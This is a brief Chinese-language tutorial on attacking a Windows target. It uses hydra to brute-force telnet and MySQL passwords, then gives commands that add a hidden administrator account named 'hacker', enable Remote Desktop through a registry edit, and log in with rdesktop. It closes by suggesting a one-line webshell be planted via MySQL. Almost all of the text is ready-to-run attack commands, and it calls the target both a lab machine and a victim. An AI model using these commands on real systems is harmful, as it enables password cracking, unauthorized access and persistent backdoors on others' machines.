1
使用命令前我们先了解一下hydra基本命令
下面我们破解一下23号端口远程登录协议
使用hydra破解23号端口 telnet协议[远程登录协议]
hydra [IP地址] [协议] -l [用户名] -P[密码字典] –vV[详细信息]
hydra 0.0.0.0 telnet -l administrator -P Top1500.txt -vV
如果命令行看着不舒服的话,可以使用以下命令打开3389远程登录界面:
以下命令在telnet远程登录连接到靶机CMD命令行里面输入:
创建一个账户为hacker密码为:woaini0.0
net user hacker woaini0.0 /add
提升到管理员组
net localgroup administrators hacker /add
本地组 管理员组 用户 添加
下一步使用命令开启3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
最后回到自己kali机器使用 rdesktop 172.16.15.24 -u hacker -p woaini0.0
远程桌面 受害者IP 指定用户 指定密码
在来破解一下3306mysql服务密码
hydra 0.0.0.0 mysql -l root -P Top1500.txt -vV
软件 目标地址 服务名 指定用户 指定密码文件 详细输出
有感兴趣的可以在mysql服务器里面插入一句话木马连接到受害者机器.